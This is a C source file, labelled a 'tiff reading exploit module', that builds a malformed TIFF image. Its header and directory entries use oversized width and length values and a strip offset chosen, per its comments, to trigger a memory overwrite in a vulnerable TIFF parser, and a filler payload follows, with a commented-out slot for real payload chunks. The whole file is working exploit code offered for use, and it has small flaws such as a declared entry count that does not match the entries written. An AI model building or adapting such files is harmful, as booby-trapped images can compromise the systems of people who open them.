/*
 * tiff reading exploit module
 *
 */
#include "ximage.h"

/*  tiff constants  */
#define TIFF_LITTLEENDIAN   0x4949
#define TIFF_VERSION    42
#define TIFF_LONG 4

#define TIFFTAG_IMAGEWIDTH      256
#define TIFFTAG_IMAGELENGTH     257
#define TIFFTAG_STRIPOFFSETS    273

/* locations of dentry data */
#define NDENTRIES 4

/*  tiff structures ripped from libtiff */
#define TIFF_HDRSZ sizeof(tiff_header)
typedef	struct {
	uint16_t	tiff_magic;	/* magic number (defines byte order) */
	uint16_t	tiff_version;	/* TIFF version number */
	uint32_t	tiff_diroff;	/* byte offset to first directory */
} tiff_header;

#define TIFF_DENTSZ sizeof(tiff_dirent)
typedef	struct {
	uint16_t		tdir_tag;	/* see below */
	uint16_t		tdir_type;	/* data type; see below */
	uint32_t		tdir_count;	/* number of items; length in spec */
	uint32_t		tdir_offset;	/* byte offset to field data */
} tiff_dirent;

typedef uint16_t tiff_ifd_count;

/* adds a dirent to the buffer, and returns new offset */
u_int put_dent(u_char *buf, u_int cur_offset,
                uint16_t tag, uint16_t type, uint32_t count, uint32_t offset)
{
    tiff_dirent td;

    td.tdir_tag = tag;
    td.tdir_type = type;
    td.tdir_count = count;
    td.tdir_offset = offset;
    memcpy(buf+cur_offset, &td, TIFF_DENTSZ);

    return (cur_offset+TIFF_DENTSZ);
}

/* */
int get_payload(u_char *buf, int len, ximage_t *xp)
{
    /*
    int t = 512;
    u_long  *p = NULL;
    p = get_chunks(t, 0xdeadbeef, 0xadeafbee);
    memcpy(buf+len, p, t);
    return (len+t);
   */
    memset(buf+len, 'A', 512);
    return (len + 512);
}

/* */
int ximage_tiff_init(ximage_t *xp)
{
    return EXIT_SUCCESS;
}

/* */
int ximage_tiff_clean(ximage_t *xp)
{
    free(xp->buf);
}

/*
 */
int ximage_tiff_fill(ximage_t *xp)
{
    int len = 0;
    tiff_ifd_count  ndents = NDENTRIES;
    u_char  buf[BS] = {0,};
    tiff_header th;

    /* setup header */
    th.tiff_magic = TIFF_LITTLEENDIAN;
    th.tiff_version = TIFF_VERSION;
    th.tiff_diroff = TIFF_HDRSZ;
    memcpy(buf, &th, TIFF_HDRSZ);
    len += TIFF_HDRSZ;

    /* 
     * set the number of dentries in this IFD. we need 2 dentries to set up our
     * evil parameters, one more dentry to trigger the vulnerable code and
     * overwrite.
     */
    memcpy(buf+len, &ndents, sizeof(ndents));
    len += sizeof(ndents);

    /* 
     * start setting up our dentries.  we need rowsperstrip and image length to
     * control the nstrips variable.  and then we need strip offsets for the
     * overwrite
     */
    len = put_dent(buf, len, TIFFTAG_IMAGEWIDTH, TIFF_LONG, 1, 0x8000000);
    len = put_dent(buf, len, TIFFTAG_IMAGELENGTH, TIFF_LONG, 1, 0x80000);
    len = put_dent(buf, len, TIFFTAG_STRIPOFFSETS, TIFF_LONG, 1, 300);
 
    /* terminate IFD */
    *(uint32_t *)(buf+len) = 0;
    len += 4;

    /* the payload */
    len = get_payload(buf, len, xp);

    /* allocate output buffer */
    xp->buf = calloc(1, len);
    if(xp->buf == NULL)
        die("calloc");
    xp->buflen = len;

    memcpy(xp->buf, buf, len);
    return EXIT_SUCCESS;
}
